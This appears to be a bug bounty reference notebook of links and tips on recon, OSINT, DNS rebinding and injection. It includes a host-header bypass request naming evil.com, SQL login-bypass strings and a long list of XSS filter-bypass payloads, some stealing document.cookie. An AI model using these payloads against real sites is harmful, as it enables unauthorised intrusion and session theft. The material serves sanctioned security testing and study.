56. <https://rapiddns.io/subdomain/example.com?full=1>
57. <https://github.com/bing0o/SubEnum>
58. <https://github.com/storenth/lazyrecon>
59. Bruteforce - <https://github.com/bp0lr/dmut>
60. <https://github.com/Josue87/gotator>
61. <https://github.com/Cyber-Guy1/Subdomainer>

{% embed url="<https://twitter.com/Alra3ees/status/1175453684567826433>" %}

{% embed url="<https://twitter.com/sprp77/status/1229319801736220674>" %}

{% embed url="<https://twitter.com/soaj1664ashar/status/1066437407954870277>" %}

{% embed url="<https://twitter.com/Random_Robbie/status/1424768789447593985?s=20>" %}

**Twitter Thread / Bugbounty Tips:**

* <https://twitter.com/HusseiN98D/status/1158503813399142401> - vHost
* <https://twitter.com/reybango/status/1146862356879826944>
* Sub-Domain Enumeration Oneliner's:
  * [*https://twitter.com/CreedHackers/status/1067449832946745344*](https://twitter.com/CreedHackers/status/1067449832946745344)
  * [*https://twitter.com/janescott\_/status/1065995260554170369*](https://twitter.com/janescott_/status/1065995260554170369)
  * [*https://gist.github.com/yassineaboukir/f70a45dfc4fcac4a0aa0840b9eba4386*](https://gist.github.com/yassineaboukir/f70a45dfc4fcac4a0aa0840b9eba4386)
  * [*https://twitter.com/plenumlab/status/1068442310147547136*](https://twitter.com/plenumlab/status/1068442310147547136)
  * *Certsspotter -*  [*https://certspotter.com/api/v0/certs?domain=hackerone.com*](https://certspotter.com/api/v0/certs?domain=hackerone.com)
  * CertSpotter Bash One Liner - [curl https://certspotter.com/api/v0/certs\\?domain\\=example.com | jq '.\[\].dns\_names\[\]' | sed 's/\\"//g' | sed 's/\*.//g' | uniq](https://intercept9.gitlab.io/osint,recon/2017/09/08/ttp-for-subdomain-enuemration.html)
  * *Oneliner Certspotter x Massdns subdomain enum -* [*https://twitter.com/plenumlab/status/1068442310147547136*](https://twitter.com/plenumlab/status/1068442310147547136)
  * *Threatcrowd -* [*https://threatcrowd.org/searchApi/v2/domain/report/?domain=hackerone.com*](https://threatcrowd.org/searchApi/v2/domain/report/?domain=hackerone.com)
  * Get List of Active Domains - <https://twitter.com/0xpatrik/status/1160669104304467978>
  * Need to pull subdomains from Rapid 7's Project Sonar - <https://twitter.com/nullenc0de/status/1095030391629598721>
  * OneLiner to get commoncrawl assets -<https://twitter.com/fasthm00/status/1145485593687625728>
  * Tips from Ben - <https://twitter.com/C1h2e11/status/1163806579474329600>
  * Quick Tip from Shubam Mittal - <https://twitter.com/upgoingstar/status/1163818517956710400>
  * <https://twitter.com/intigriti/status/1194595250049835010>
  * [TimeForA #BugBountyTip I use http://Zone-H.org to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT![👁️](https://abs-0.twimg.com/emoji/v2/svg/1f441.svg) ](https://twitter.com/HusseiN98D/status/1194645713851957248)
  * Thread from Somdev - <https://twitter.com/s0md3v/status/1202461998283251712>
  * [From your experience: what is the fastest and most accurate subdomain brute forcer? #bugbounty #bugbountytips #infosec #bugbounty #pentest - ](https://twitter.com/HusseiN98D/status/1193623919623884803)
  * <https://publicwww.com/websites/%22.yahoo.com%22/>
  * <https://securitytrails.com/list/apex_domain/tilkee.info>
  * <https://sonar.omnisint.io/>

{% embed url="<https://twitter.com/bhavukjain1/status/1288834983755276289>" %}

{% embed url="<https://twitter.com/Jhaddix/status/975089650552356864>" %}

{% embed url="<https://twitter.com/zer0pwn/status/1297897435751211009?s=20>" %}

Subdomain Bruteforce - [#ffuf](https://twitter.com/hashtag/ffuf?src=hashtag_click)[@ngkogkos](https://twitter.com/ngkogkos)[@joohoi](https://twitter.com/joohoi)[@Jhaddix](https://twitter.com/Jhaddix) Subdomain bruteforce with ffuf on 443 port. It works fine ffuf -u [https://FUZZ.rootdomain.com](https://t.co/lgJRG9rq6y?amp=1) -w jhaddixall.txt -v | grep "| URL | " | awk '{print $4}'34578

* [Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' http://api.iptoasn.com/v1/as/ip/$(dig +short $domain | head -1)| jq .as\_number);echo '!gas'$a''| nc http://whois.radb.net 43 | tr " " "\n" | sed -e '1d' -e '$d'](https://twitter.com/absshax/status/1176193027154382848?s=20)

Horizontal domain correlation [https://viewdns.info/reversewhois/](https://t.co/lZaXVJ43ul?amp=1) - Free [https://domaineye.com/reverse-whois](https://t.co/JwWvl2RKHB?amp=1) - Free [https://reversewhois.io](https://t.co/jS4EIQ9fol?amp=1) - Free [https://whoxy.com](https://t.co/MYlMokDfMg?amp=1) - Free web, not free API. [http://reversewhois.domaintools.com](https://t.co/wSM7XaWIrb?amp=1) - Not free [https://drs.whoisxmlapi.com/reverse-whois-search…](https://t.co/ZtsHI270rf?amp=1) - Not Free [https://domainiq.com](https://t.co/j3aulYZsAe?amp=1) - Not Free

[<br>](https://twitter.com/GochaOqradze/status/1224345381519024128)Vhost writeup - <https://medium.com/@meraid.kr/how-i-solved-hackerone-h1-212-ctf-e6d7171a55e6>


# Resolvers

{% embed url="<https://twitter.com/BonJarber/status/1363574763134754816?s=20>" %}

* <https://github.com/BonJarber/fresh-resolvers>

{% embed url="<https://github.com/d3mondev/puredns>" %}


# Javascript Enumeration

**Blogs / Writeups / Videos:**

{% embed url="<https://www.youtube.com/watch?v=0jM8dDVifaI>" %}

<https://docs.google.com/presentation/d/1aGSfiN3DhTYeZ_b0uU2U2bWa3Ziuf6xXkzJlIXpLimU/edit#slide=id.p>

**Tools:**

A tool to get javascript files from a list of URLS or subdomains - <https://github.com/lc/subjs>

* <http://blog.r0b.re/hacking/pentesting/bugbounty/recon/web/js/2020/07/05/jsmon-automated-javascript-file-monitoring.html>
* <https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7>
* <https://thehackerish.com/javascript-enumeration-for-bug-bounty-hunters/?utm_source=newsletter&utm_medium=email&utm_campaign=javascript_enumeration_for_bug_bounty_hunters&utm_term=2020-09-25>
* <https://github.com/robre/scripthunter>
* <https://gist.github.com/gwen001/0b15714d964d99c740a7e8998bd483df>

**Tweets:**

{% embed url="<https://twitter.com/soaj1664ashar/status/1179710102871433216>" %}

{% embed url="<https://twitter.com/Random_Robbie/status/1181576691904385024>" %}

{% embed url="<https://twitter.com/ShMalav/status/1173080907177086976>" %}

A one-liner to extract all API endpoints from a [#JavaScript](https://twitter.com/hashtag/JavaScript?src=hashtag_click) file. Especially useful for [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click) hunting. - <https://twitter.com/EthicalMike/status/1205892500675874823>

\--<https://github.com/arbazkiraak/LinksDumper>

{% embed url="<https://github.com/GerbenJavado/LinkFinder/tree/chrome_extension>" %}

* <https://twitter.com/EthicalMike/status/1205892500675874823>
* <https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/>
* <https://www.youtube.com/watch?time_continue=11&v=FTeE3OrTNoA&feature=emb_logo>
* <https://github.com/Cillian-Collins/subscraper>
* <https://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea>
* <https://github.com/KathanP19/JSFScan.sh>
* <https://www.youtube.com/watch?v=btG3LP_3lnA&feature=youtu.be>
* <https://www.youtube.com/watch?v=nkznsNxDM5k>
*


# After Recon

* Hey all as i said yesterday , I just published my first blog "BeginnersQuest(part-1)-What to do after recon?".Please do suggest me the changes you want to see in the next parts, Enjoy !! [https://link.medium.com/2QZP0LRtB5](https://t.co/47dJkDlg6c?amp=1) [#bugbounty](https://twitter.com/hashtag/bugbounty?src=hashtag_click) [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#infosec](https://twitter.com/hashtag/infosec?src=hashtag_click) [#bughunting](https://twitter.com/hashtag/bughunting?src=hashtag_click) [#blog](https://twitter.com/hashtag/blog?src=hashtag_click)
* <https://dewcode.medium.com/finding-bugs-at-limited-scopes-programs-single-domain-websites-d3c2ff396edf>

{% embed url="<https://twitter.com/storenth/status/1340183487647784960?s=20>" %}

{% embed url="<https://www.notion.so/spinthehack/Checklist-2-After-Recon-Deep-Inside-6a2d8c280a28498d8ad7c38568603b2d>" %}


# Finding Information Using Public Resources

Shodan

Censys

ZoomEye

Fofa

Search Engine for Hackers -&#x20;

{% embed url="<https://twitter.com/trimstray/status/1112994200235204609>" %}

Nerdydata - <https://twitter.com/soaj1664ashar/status/621208211954253824>

{% embed url="<https://twitter.com/soaj1664ashar/status/608933309809311744>" %}

Scope is Big -

{% embed url="<https://twitter.com/Th3G3nt3lman/status/1091816735798378502>" %}

Collection of Shodan Scripts - <https://github.com/random-robbie/My-Shodan-Scripts>

{% embed url="<https://twitter.com/search?q=shodan%20ssl&src=typed_query>" %}

{% embed url="<https://medium.com/@prateek_0490/how-recon-helped-samsung-protect-their-production-repositories-of-samsungtv-ecommerce-estores-4c51d6ec4fdd>" %}

{% embed url="<https://0x00sec.org/t/using-search-engines-for-fun-and-bounties/23832/5>" %}

{% embed url="<https://twitter.com/AmitMDubey/status/1355328724644716545?s=20>" %}


# OSINT

Search Engine For Hackers - <https://twitter.com/trimstray/status/1086705742793658369?lang=en>

OSINT - <https://twitter.com/BadassBowden/status/1132663671962972164>

\---<https://osint.link/>

{% embed url="<https://redhuntlabs.com/talks_and_presentations.html>" %}

{% embed url="<https://medium.com/@micallst/osint-resources-for-2019-b15d55187c3f>" %}

Shodan -&#x20;

Search Queries - <https://twitter.com/_harleo/status/1201513513929396225>

{% embed url="<https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6>" %}

* <https://medium.com/@alyssa.o.herrera/reconnaissance-to-a-quick-p1-fc1085d0fb22>
* <https://medium.com/@malavsharma/magic-of-shodan-15dd17854099>
* shodan - hostname:company.com
* Shodan dorks
* <https://github.com/JavierOlmedo/shodan-filters>
* <https://medium.com/@shifacyclewala/the-complete-subdomain-enumeration-guide-b097796e0f3>
* <https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05>
* <https://twitter.com/Dinosn/status/1341846433968713728?s=20>

{% embed url="<https://twitter.com/Random_Robbie/status/1218187926380666881>" %}

![https://twitter.com/Dheerajmadhukar/status/1433369419372134400](/files/-Mj82YxSv7bwzANXpBmN)

Censys -&#x20;

* <https://github.com/censys/nmap-censys>

Tools -&#x20;

**Favicon search**

* <https://devanshbatham.github.io/osint/2021/09/11/weaponizing-favicon-ico.html>

Google Analytics bugbounty

\[[#OSINT](https://twitter.com/hashtag/OSINT?src=hashtag_click)] Find domains by registrant name or email [https://viewdns.info/reversewhois/](https://t.co/HfWPFdVy7P?amp=1)

{% embed url="<https://twitter.com/adrien_jeanneau/status/1250740511402532865>" %}

* Reverse Whois - <https://github.com/MilindPurswani/whoxyrm>

[Try ssl:target.\* 200 Try http://Ssl.cert.subject.CN:"target.\*" 200](https://twitter.com/GodfatherOrwa/status/1363803767016198146?s=20)

Google search - <https://github.com/deepseagirl/degoogle>

{% embed url="<https://twitter.com/Mik317_/status/1367811775341674497?s=20>" %}

{% embed url="<https://twitter.com/edu4rdshl/status/1396188826083774469?s=20>" %}

* <https://github.com/ninoseki/mitaka>


# Cloud

![](/files/-MTePrNhv6VBrRZoDW-k)

<https://hackingthe.cloud/aws/exploitation/local-priv-esc-mod-instance-att/>


# Wayback

* <https://twitter.com/soaj1664ashar/status/1182215094790492160>
* <https://twitter.com/payloadartist/status/1101359784454807553>
* <https://medium.com/@ghostlulzhacks/wayback-machine-e678a3567ec>

Tools - <https://github.com/Neolex-Security/WaybackRust>

<https://github.com/gwen001/pentest-tools/blob/master/wayback-analyzer.php>


# Parameter / Content Discovery

* gospider
* paramspider
* hakcrawler
* arjun
* httpx
* <https://github.com/edoardottt/cariddi>

Tweets:

{% embed url="<https://twitter.com/stokfredrik/status/1316661667267305472>" %}

{% embed url="<https://twitter.com/pry0cc/status/1316357215985561602>" %}

[gau + anti-burl + secretfinder = informations disclosure@TomNomNom@Yassineaboukir@stokfred](https://twitter.com/m4ll0k/status/1275047986180100096?s=20)rik[<br>](https://twitter.com/m4ll0k/status/1275047986180100096/photo/1)

![](/files/-MTAGMrXlBD_KI0LLlya)

[I just released Parth It finds commonly vulnerable parameter names to prioritize their testing. See screenshot below. You can import your@Burp\_Suite history, discover URLs using CommonCrawl, OTX and Waybackmachine or a simple txt file. Github: ](https://twitter.com/s0md3v/status/1296132598574362624?s=20)[https://github.com/s0md3v/Parth](https://t.co/eoDI0ut6nj?amp=1)

![](/files/-MTAGck_Ey_m0Px488Vy)

![](/files/-MTBktDck1f25pnk10un)

![https://twitter.com/Haoneses/status/1291387580299321358?s=20](/files/-MTFq10IJE4nlpm0sISp)

{% embed url="<https://twitter.com/imran407704/status/1297851186721067008?s=20>" %}

![](/files/-MTG0_Kx45LhGsHk8Nb2)

Tools:

* <https://github.com/dwisiswant0/galer>

{% embed url="<https://twitter.com/ITSecurityguard/status/1406630113102413827?s=20>" %}

{% embed url="<https://github.com/Sh1Yo/x8>" %}

{% embed url="<https://medium.com/geekculture/params-discovering-hidden-treasure-in-webapps-b4a78509290f>" %}


# Broken Link Highjacking

*

![https://twitter.com/micha3lb3n/status/1289939398797037568?s=20](/files/-MTAG09hneQ4uZFLDb4J)


# Host Header

Common Headers for Host Header Injection Attack:-

1. Host:
2. X-Host:
3. X-Forwarded-For:
4. X-Forwarder- Host:
5. X-Forwarder- Server:
6. Forwarded:
7. X-HTTP-Host- Override:
8. X-Forwarded-Proto headers:
9.

Typical Host Header Injection Bypass: POST /endpoint/ HTTP 1.1 Host: [http://evil.com](https://t.co/Hg2GwZOUIf?amp=1) Response: 403, 404 Bypass: POST /<https://endpoint/> HTTP 1.1 Host: [http://evil.com](https://t.co/Hg2GwZOUIf?amp=1) Response: 200, 302 Give it a try!!


# Injection

References for Injection Attacks

**Blogs / Articles:**

* <https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3>
* <https://threat.tevora.com/stop-collaborate-and-listen/> -Blind Command Injection - SSRF
* <https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z>
* <https://gerbenjavado.com/manual-sql-injection-discovery-tips/>
* Practical JSONP Injection - [Practical JSONP Injection](https://securitycafe.ro/2017/01/18/practical-jsonp-injection/)
* XSLT Server Side Injection Attacks [https://contextis.com/blog/xslt-server-side-injection-attacks](https://t.co/ZqvTP3qZTZ?amp=1)
* Log Injection - <https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/>
* Remote Code Execution with EL injection - [https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://t.co/eUvA6wDgFA?amp=1)
* Argument Injection - <https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/>
* Argument Injection - <https://staaldraad.github.io/post/2019-11-24-argument-injection/>
* Argument Injection - <https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68>
  * Video - <https://www.youtube.com/watch?v=FHiJnw9TTX8>
* **AST Injection, Prototype Pollution to RCE -** [**https://blog.p6.is/AST-Injection/#How-to-Detect**](https://blog.p6.is/AST-Injection/#How-to-Detect)
* **SSTI -** [**https://blog.isec.pl/beyond-ssti/**](https://blog.isec.pl/beyond-ssti/)
* [**https://bad-jubies.github.io/Blind-SQLi-1/**](https://bad-jubies.github.io/Blind-SQLi-1/)
* **Command Injection -**[**https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38\&srid=kl8Z**](https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38\&srid=kl8Z)
* [**https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17**](https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17)
* **CSS Injection -** [**https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092**](https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092)
* [**https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1**](https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1)
* [**https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716**](https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716)
* [**https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b**](https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b)
* **SQL Injection -** [**https://twitter.com/rodoassis/status/1438186092486877190?s=20**](https://twitter.com/rodoassis/status/1438186092486877190?s=20)
* [**https://outpost24.com/blog/X-forwarded-for-SQL-injection**](https://outpost24.com/blog/X-forwarded-for-SQL-injection)
* [How I Escalated a Time-Based SQL Injection to RCE](https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398)
* #### <https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398>

**Payloads / Cheatsheets:**

* <https://github.com/Gabriel-Labs/OOB-SQLi>
*

**Twitter Threads / Tips:**

* [**https://github.com/xer0days/SQLi-Query-Tampering**](https://github.com/xer0days/SQLi-Query-Tampering) **-** [**https://twitter.com/Xer0Days/status/1292488714241941504?s=20**](https://twitter.com/Xer0Days/status/1292488714241941504?s=20)
* [1. Time Based SQL Injection : Used payload: '+(select\*from(select(sleep(20)))a)+' in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters \[Like username, email, otp\] for SQLi check. #bugbountytips 2. Reflected XSS + CSRF to Account Takeover : )](https://twitter.com/sunilyedla2/status/1333029227994628096?s=20)
* [Time based SQLi -> forgot password Endpoin](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20)[1. Payload used: '%2b(select\*from(select(sleep(20)))a)%2b' 2. Endpoint: /Forgot password Cheers Do share your story in comments if you got SQLi at weird endpoint](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20)
* SPEL Injection - <https://twitter.com/h1pmnh/status/1425831338234589184?s=20>
* EL Injection

{% embed url="<https://twitter.com/secalert/status/1119526862521282560?s=20>" %}

<br>

**Tools:**

**Other References:**

```
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
```

[Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=\[1\] /?q\[\]=1 /?q=1\` /?q=1\ /?q=1/\*'\*/ /?q=1/\*!1111'\*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips #SqlInjection](https://twitter.com/community_bug/status/1345942914296205316?s=20)


# Other Injection

Host Header Inj - <https://hackerone.com/reports/698416>


# DNS Rebinding

{% embed url="<https://geleta.eu/2019/my-first-ssrf-using-dns-rebinfing/>" %}

{% embed url="<https://twitter.com/NahamSec/status/1138584593865379840>" %}

{% embed url="<https://twitter.com/fasthm00/status/1149370114086592513>" %}

{% embed url="<https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325>" %}

{% embed url="<https://twitter.com/LooseSecurity/status/1191479689702973443>" %}

tool - <https://github.com/daeken/httprebind>

![](/files/-LzG3-_KeWMwxOG030Un)

{% embed url="<https://rbnd.gl0.eu>" %}

{% embed url="<https://github.com/nccgroup/singularity/>" %}

* Learn DNS here - <https://www.youtube.com/watch?v=OYe1nri0zOA>
* <https://labs.f-secure.com/blog/from-http-referer-to-aws-security-credentials/>
* DNS takeover - <https://www.youtube.com/watch?v=C0LQJTXFosI>
* DNS Tunneling - <https://blog.netspi.com/dns-tunneling-with-burp-collaborator/>
* <https://blog.mindedsecurity.com/2021/02/journey-into-beauty-of-dnsrebinding.html>


# Cross Site Scripting (XSS)

References for Cross Site Scripting Attacks

**Blogs  / Articles:**

* <https://medium.com/@Ch3ckM4te/self-xss-to-account-takeover-72c89775cf8f>
* Blind XSS - <https://ardern.io/2019/06/20/payload-bxss/>
* <https://brutelogic.com.br/blog/xss-limited-input-formats/>
* <http://codegrazer.com/blog/7-reflected-xss.html>
* <https://www.shawarkhan.com/2017/09/exploiting-multiple-self-xsses-via.html>
* <https://medium.com/bugbountywriteup/effortlessly-finding-cross-site-script-inclusion-xssi-jsonp-for-bug-bounty-38ae0b9e5c8a>
* <https://blog.innerht.ml/the-misunderstood-x-xss-protection/>
* <https://smaranchand.com.np/2020/02/the-tricky-xss/>
* <https://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/>
* <https://infosecwriteups.com/automating-xss-identification-with-dalfox-paramspider-e14283bb7916>
* <https://www.bugcrowd.com/blog/the-ultimate-guide-to-finding-and-escalating-xss-bugs/?utm_campaign=XXS-Bug-Infl&utm_medium=social&utm_source=twitter>
* <https://blog.noob.ninja/story-of-a-parameter-specific-xss/>

Upgrading Self XSS:

![https://twitter.com/hackerscrolls/status/1299711808312356865](/files/-MIQA2IDHQc74i7k7YYA)

**Tools / Cheatsheets:**

* <https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks>
* BXSS tools - <https://github.com/psych0tr1a/elScripto>
* <https://github.com/RenwaX23/XSS-Payloads>
* <https://github.com/terjanq/Tiny-XSS-Payloads>
* <https://github.com/payloadbox/xss-payload-list>
* <https://github.com/hahwul/dalfox>
* <https://netsec.expert/posts/xss-in-2021/>
* <https://github.com/kleiton0x00/XSScope>

if you google ".xss.ht" you can find where others are testing and maybe reveal some priv programs. :P

**Twitter Threads:**

* <https://twitter.com/soaj1664ashar/status/1175348157758287872>
* <https://twitter.com/intigriti/status/1181904057063133186>
* <https://twitter.com/SamuelAnttila/status/1223671857590652928> - PDF
* <https://github.com/elkokc/reflector>
* <https://twitter.com/SamuelAnttila/status/1224803951758991360>&#x20;
* <https://twitter.com/ShawarkOFFICIAL/status/910670264383557633>
* Blind XSS tip -<https://twitter.com/intigriti/status/1093468744079364096>
* <https://twitter.com/samwcyo/status/1138183504745902085>
* <https://twitter.com/vishnugadupudi/status/1184138040442097664/photo/1>

**Payloads:**

```
<img ="=" title="><img src=1 onerror=alert(1)>"
<<img src=x onerror='prompt(1)'<
#BugBountyTip When you are dealing with XSS try to change the device or user-agent to Mobile you might get it work, in my case the homepage is different in devices the XSS is in username and the payload is Unicode UTF-16
XSS vector without >, \, 'alert', parentheses, quotes and spaces <svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//

thank you 
@brutelogic
...WAF Bypass: "><brute+onbeforescriptexecute=a=alert,a(1%26%23x29> #security #XSS #KNOXSS

onffocusofocuscfocusufocuss="prompt(1)" - useful when waf replaces things like 'focus' to null, leaving us with onfocus="prompt(1)" - https://twitter.com/zseano/status/837160885181243392
?x=<script%20src=data:&x=alert(1);>

One that should bypass some XSS filters, by 
@dsopas
 
<meter onmouseover="alert(1)"

Uppercase #XSS 
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
http://brutelogic.com.br/webgun/test.php?p=%3CSVG%20ONLOAD=%26%2397%26%23108%26%23101%26%23114%26%23116%281%29%3E

XSS bypass for a weak filter - riyaz walikar
<img src=x onerror="[]['constructor']['constructor']('ale'+'rt(0)')()">

var of "Function ('ale'+'rt(0)')()"

<svg>
<a xml:base="javascript:alert(1)//" href="#"><circle r="100" />
</svg>
//Firefox :) .- https://twitter.com/kinugawamasato/status/898950198826721280 

#XSS Tip Smiling face with sunglasses
I guess this one could solve all your HTMLi problems (regular, inline & JS block)

'"</Script><Html Onmouseover=(alert)(1) // - https://twitter.com/brutelogic/status/903987636448219136

This might lead to some fun XSS on status-code errors:
header("HTTP/1.0 999 <img src=x onerror=alert(1)>"); - https://twitter.com/fransrosen/status/912795907313356800


SomeTime It's Work!
#XSS #Payload

<sVg/oNloAd="JaVaScRiPt:/**\/*\'/"\eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))">

<iframe src=jaVaScrIpT:eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))>

"><svg/onload=alert(1)>
<img>/><svg/onload=alert(1)>
"></\/\</script><script>alert(1)</script>
"><script>alert("xss");</script>
<div onmouseover="alert('XSS');">Hello :) 
^ [My favorite one - works like 80% of the time for me].
</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
That's all for now that I'll share.
Enjoy the payloads too. ;)

x@x.com<--`<img/src=` onerror=alert("Friendly-XSS")> --!> 
or
<--`<img/src=` onerror=alert("Friendly-XSS")> --!>
https://twitter.com/DaherMohamed4/status/1277009961688719360

To test XSS + SQLi + SSTI/CSTI with the same payload use : 

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection 

"><svg/onload=prompt(5);> ==> for XSS 

{{7*7}} ==> for SSTI/CSTI

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

CSP Bypass,  script-src 'self' data:

<script ?/src="data:+,\u0061lert%281%29">/</script>

When you find input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work

"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works

Finally found my first bug on 
@synack
..I am just loving it. 
Bug: XSS through file upload.

Payload: */alert(1)</script><script>/*
https://twitter.com/ManasH4rsh/status/1358742847789232128?s=20

There is so much to learn about HTML and JS hacks from this code:

<svg/onload=throw/**/Uncaught=window.onerror=eval,&quot;;alert\501\51&quot;>

This is inspired by 
@garethheyes
 and will execute an 'alert(1)' without using parentheses, spaces or quotes!
 
 The Best XSS Polyglot! Police cars revolving lightPolice cars revolving light

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</stYle/</titLe/</teXtarEa/</scRipt/--!><h1>aa</h1>\x3csVg/<sVg/oNloAd=alert()//>\x3e



</a><a href=https://www.google.com>Test</a>

\"><<img onerror=alert(49609) src>

"><<img onerror=alert(49609) src>

https://github.com/TheKingOfDuck/easyXssPayload/blob/master/burpXssPayload.txt

HTML INJECTION + XSS INJECTION Heavy check mark

/<div+id=JavaScript>/<h1>_Y000!_

/<div+id=JavaScript>/<marquee>_Y000!_</marquee>

/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>

Url/?color=
Payloas

"><svg/onload=alert(document.domain)>"

Url/?language=
Payload

%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

 Url/?redirect_url=
Payload

javascript:alert()

Without ">" (XSS)

<svg onload='alert(1)'
<svg onload="alert(1)"
<svg onload=alert(1)//
<svg onload=alert(1)+
<svg onload=alert(1)<!--

<opening_tag>PAYLOAD</closing_tag>

<svg onload=alert(1)%20
<svg onload=alert(1)%0A
<svg onload=alert(1)%0C
<svg onload=alert(1)%0D
<svg onload=alert(1)%09

<opening_tag>PAYLOAD</closing_tag>

Bug : RXss 
Payload : "'`><\x00img src=xxx:x onerror=javascript:alert(1)>

Final payload:
<svg><animate onend=a\u006cert(1) dur=1s>

The final payload :
<a class="w-100" href=javascript:alert(document.cookie) // target=_self target="_blank">

Paylaod - \">'>\"><img/src/onerror=confirm(document.cookie)>

Cross mark "'><H1 on*>1
White heavy check mark "'><H1>1

Mi payload final fué:

"><details/open/ontoggle=prompt("/xss_by_Y000!/")>

<input/onfocus=prompt(document.domain) autofocus>

Some payloads that worked for me in popping up a stored XSS:-

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XSS/XSS-OFJAAAH.txt


“><<img onerror=alert(document.cookie) src>
```

{% embed url="<https://twitter.com/intigriti/status/1268879051063726081>" %}

{% embed url="<https://twitter.com/hakluke/status/1293501513663422464>" %}

![](/files/-MMz2U0dY_te99rWOV-T)

* Did you know \<a ping="url1 url2 url3 ..."> is a thing?![Face screaming in fear](https://abs-0.twimg.com/emoji/v2/svg/1f631.svg)

![](/files/-MT4MVQRhYZXsf-CrdCx)

![](/files/-MTeRj58dzjbMWexhrnT)

Y[ou can serve a XSS payload from a XML file: xss.xml: \<?xml version="1.0" encoding="UTF-8"?> \<html xmlns:html="http://w3.org/1999/xhtml"> \<html:script>prompt(document.domain);\</html:script> \</html>](https://twitter.com/renniepak/status/1339523240235069440)<br>

{% embed url="<https://twitter.com/LewisArdern/status/1075575287235006464?s=20>" %}

DOM XSS - <https://portswigger.net/blog/introducing-dom-invader>&#x20;

* XSS Tips - <https://twitter.com/b4walid>
* <https://netsec.expert/posts/xss-in-2021/>

{% embed url="<https://twitter.com/Alra3ees/status/1396781745400389634?s=20>" %}

{% embed url="<https://twitter.com/brutelogic/status/1138805808328839170?s=20>" %}

{% embed url="<https://twitter.com/cryptosecdev/status/1163719969495891969?s=20>" %}


# Weaponizing XSS

* <https://www.trustedsec.com/blog/tricks-for-weaponizing-xss/>
* <https://portswigger.net/web-security/cross-site-scripting/dangling-markup>
* <https://int0x33.medium.com/day-35-xss-payloads-217ab6c6ead7>
* <https://labs.f-secure.com/blog/getting-real-with-xss/>
* <https://cube01.io/blog/Moodle-DOM-Stored-XSS-to-RCE.html>
* <https://medium.com/@nnez/always-escalate-from-self-xss-to-persistent-xss-on-login-portal-54265b0adfd0>
